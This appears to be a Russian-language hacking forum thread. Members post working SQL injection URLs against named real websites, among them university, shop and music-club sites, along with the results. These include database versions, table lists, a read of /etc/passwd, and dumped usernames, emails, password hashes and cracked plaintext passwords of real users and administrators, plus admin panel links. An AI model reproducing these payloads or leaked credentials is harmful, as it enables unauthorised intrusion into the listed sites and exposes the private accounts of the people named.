http://www.naturamunda.lt Code: http://www.naturamunda.lt/index.php?page=news.php&id=99'+union+select+1,user(),3,4,5,6,version(),8,9/* tarpininka_nm@localhost 5.0.45-community-log Идем дальше: Code: http://www.naturamunda.lt/index.php?page=news.php&id=99'+union+select+1,user(),3,4,5,6,TABLE_NAME,8,9+from+ INFORMATION_SCHEMA.TABLES/* 30 таблиц, среди них: users_db personalas user_privileges и др. http://sperling-coll.dk Code: http://sperling-coll.dk/?filenavn=varer.php4&traeid=-1+union+select+concat_ws(char(58),user(),version(),database())/* И читаем титул: Sperling - root@localhost:5.0.27:dbsperlingNY Думаю, проблем быть не должно =) А это Вам на съедение: Code: http://www.hajosalfred.hu/eng/news.php?id=-1+union+select+1,2,3,4,5+--+ =)
Code: http://www.milon.ru/index.phtml?id=-6+union+select+1,LOAD_FILE(char(47,101,116,99,47,112,97,115,115,119,100)),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20/* Code: http://www.milon.ru/index.phtml?id=-6+union+select+1,AES_DECRYPT(AES_ENCRYPT(USER(),0x71),0x71),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20/* Хеш рута вытащить не смог.
MegaBits Вот рут ,но так-же как в моём предъидущем посте не всё понятно root:032c41e8435273a7 =letmein Запрос : _http://www.milon.ru/index.phtml?id=-6+union+select+1,AES_DECRYPT(AES_ENCRYPT(user,0x71),0x71),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20+from+mysql.user+limit+3,10/* или user или password вместе нет
Code: http://www.omantribune.com/index.php?page=news&id=99999+union+select+1,2,3,4,5,6,7,8,9/* [email protected]mantribune:4.1.22-max-log Code: http://www.turkystan.kz/page.php?page_id=14&number_id=99999+union+select+1,2,3,4/* turkesdb@hosting:turkesdb:4.1.22
Code: http://www.m-logos.ru/seminars/info.phtml?id=-727+union+select+1,2,3,4,concat_ws(char(58),user(),version()%20%20,database()),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20/* [email protected]:4.0.27-log:mlogos
Только учусь!!! shop notebook.dn.ua Code: http://notebook.dn.ua/?brand=-78/**/union/**/select/**/1,2,3,4,5,6,7,8,9,10,concat(database(),0x3a,version(),0x3a,user())/* godnua_newmarket:4.1.20:godnua_mark@localhost Code: http://notebook.dn.ua/?brand=-78/**/union/**/select/**/1,2,3,4,5,6,7,8,9,10,concat(fio,0x3a,mail)/**/from/**/users/* ------------------------------------------------- там еще есть таблицы, но нужно подбирать
arm.st.uz _http://arm.st.uz/index.php?m=news&id=-1+union+select+1,concat_ws(0x3a,version(),user(),database()),3,4,5-- 4.1.19-log:arm@localhost:arm admin:70222949cc0db89ab32c9969754d4758 pass:1290 sk:70222949cc0db89ab32c9969754d4758 pass:1290 arm:5bbc7cc2da7217ccaf66f733b3fef728 pass:11183 [email protected] pass:11183 в админку не пускает, стоит привязка к ипу
http://9955599.ru/jobsect.php?section=-5+union+select+null,version()/* [email protected]/4.1.22/telgaz_db если ктонить раскоыряет напишите плиз чтото у меня не получилось дальше((
Lamersha, по-моему, там нет ничего интересного Code: resume id name pay mark date city section age vacancy id city section Хотя хз, мне лень дальше ковырять =)
http://www.dixis.kz/index.php?shownews=true&nid=all&cat=-1+union+select+1,2,concat(version(),char(58),user(),char(58),database()),4,5,6,7,8,9,10+/* 4.1.22-standard-log dixis_user@localhost dixis_shop
upc.edu http://www.upc.edu/tercercicle/estudis/index_ambit.php?id_ambit=-1+union+select+1,2,3,4,concat_ws(0x3a,version(),user(),database())/* 4.0.24_Debian-10sarge1-log:intranet@localhost:tercercicle intranet@localhost Ну могу докрутить эти скули, вроде выводиться, а инфу показываеть не хочет library.uiuc.edu http://www.library.uiuc.edu/agx/agnic/soynic/info.php?id=-1'+union+select+123-- spo.princeton.edu http://spo.princeton.edu/index.php?id=-1'+or+1=1/* ethology.ru 5.0.45-log:[email protected]:u12802 alex pass:11 [email protected] pass:183 mike:183[email protected] prox:124:[email protected] gilburd:1324[email protected] voronova:23454:[email protected] labas:5321:[email protected] protopopov:5463[email protected] Danio:1098:[email protected] irina:4359:[email protected] grebenshikov:36574:[email protected] gerbek:gerbek123:[email protected]
2 gibson Первая: _http://www.library.uiuc.edu/agx/agnic/soynic/info.php?id=-1'+union+select+@@version-- Microsoft SQL Server 2005 - 9.00.3054.00 (X64) Mar 23 2007 18:41:50 Copyright (c) 1988-2005 Microsoft Corporation Standard Edition (64-bit) on Windows NT 5.2 (Build 3790: Service Pack 2) _http://www.library.uiuc.edu/agx/agnic/soynic/info.php?id=-1'+union+select+table_name+from+information_schema.tables-- SoyLinks NewLinksSoy NewLinksCorn _http://www.library.uiuc.edu/agx/agnic/soynic/info.php?id=-1'+union+select+table_name+from+information_schema.tables+WHERE+TABLE_NAME+NOT+IN+('SoyLinks','NewLinksSoy')-- и т.д. мне дальше лень --------------------------- вторая:mysql _http://spo.princeton.edu/index.php?id=1'+order+by+23/* Скорее всего два Select столбца 23 ,а через Union ругается: The used SELECT statements have a different number of columns т.е. подзапросы
http://www.cyberbody.ru/shop.php?catid=1121000000000+UNION+SELECT+1,concat_ws(0x3a,username,user_password,user_email,user_icq),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32+from+phpbb2_users/* все качки на одной страничке)))
http://www.nsastutter.org/content/index.php?catid=-52/**/union/**/select/**/1,concat_ws(0x3a,User(),Database(),Version()),3,4,5/* [email protected] stutter 4.0.25-standard-log
Киевский Рок Клуб http://www.rock.kiev.ua/arhiv/id.php?id=-99999+union+select+1,2,3,concat_ ws(0x3a,id,login,password,fname,lname,email),5,6,7,8,9,10,11+from+users/* USER: rock@localhost VERSION: 5.0.32-Debian_7etch5-log DATABASE: rock 1: DR-1:AkbcA:Ремиш:Дмитрий:[email protected] 28:YK-1:nbyedbtkm:Юлия:Коломиец:[email protected] 1657:YK-10:7qOAjTq6dN26udL:Комаров:Юрий:[email protected] Регистрация и админка тут: http://www.rock.kiev.ua/kontakt/index.php
[PNphpBB2] table pn_phpbb_users: _http://albireo.lt/index.php?name=PNphpBB2&file=index&c=9999/**/union/**/select/**/5,table_name,5,5,5/**/from/**/information_schema.tables/**/where/**/table_schema=database()/**/and/**/table_name/**/like/**/0x257573657225/**/limit/**/3,1/* column username: _http://albireo.lt/index.php?name=PNphpBB2&file=index&c=9999/**/union/**/select/**/5,column_name,5,5,5/**/from/**/information_schema.columns/**/where/**/table_name=0x706E5F70687062625F7573657273/**/and/**/column_name/**/like/**/0x257573657225/**/limit/**/1,1/* column user_password: _http://albireo.lt/index.php?name=PNphpBB2&file=index&c=9999/**/union/**/select/**/5,column_name,5,5,5/**/from/**/information_schema.columns/**/where/**/table_name=0x706E5F70687062625F7573657273/**/and/**/column_name/**/like/**/0x257061737325/**/limit/**/0,1/* THE END: _http://albireo.lt/index.php?name=PNphpBB2&file=index&c=9999/**/union/**/select/**/5,concat(0x3C62722F3E,0x6964,0x3A,user_id,0x3C62722F3E,0x75736572,0x3A,username,0x3C62722F3E,0x70617373,0x3A,user_password),5,5,5/**/from/**/pn_phpbb_users/**/WHERE/**/user_id=2/*
Для "поклонников" Metallica... www.metpage.de metnews@localhost:5.0.20-max-log:metnews Доступна таблица wn_user: Tommy:3fac1eead50fcb46ec56e0df6452251e:suku3s43 FrayedEnd:455018c4669f687ff757ffd4be3045cb:sebsucks TheUnforgivenII:e93ac9964ed9c0444cfbfa9f8a26429a:metfan6 Elloy:c76f54e8d0db01297ac7a2e47be4cf13 P.S. Пассы расшифровал с помошью md5.xek.cc, пользуемся...
http://www.vmo.kz/?start=news&id=-1+union+select+1,2,3,CONCAT(user(),char(58),version(),char(58),database()),5,6,7,8,9,10,11,12,13,14,15+from+admin/* vmovkkz_1@localhost 4.1.22-standard-log vmovkkz_1 --------------------------------------------------- http://www.vmo.kz/?start=news&id=-1+union+select+1,2,3,CONCAT(id,char(58),login,char(58),password),5,6,7,8,9,10,11,12,13,14,15+from+admin/* id:1 login:admin passord:admin http://www.vmo.kz/admin.php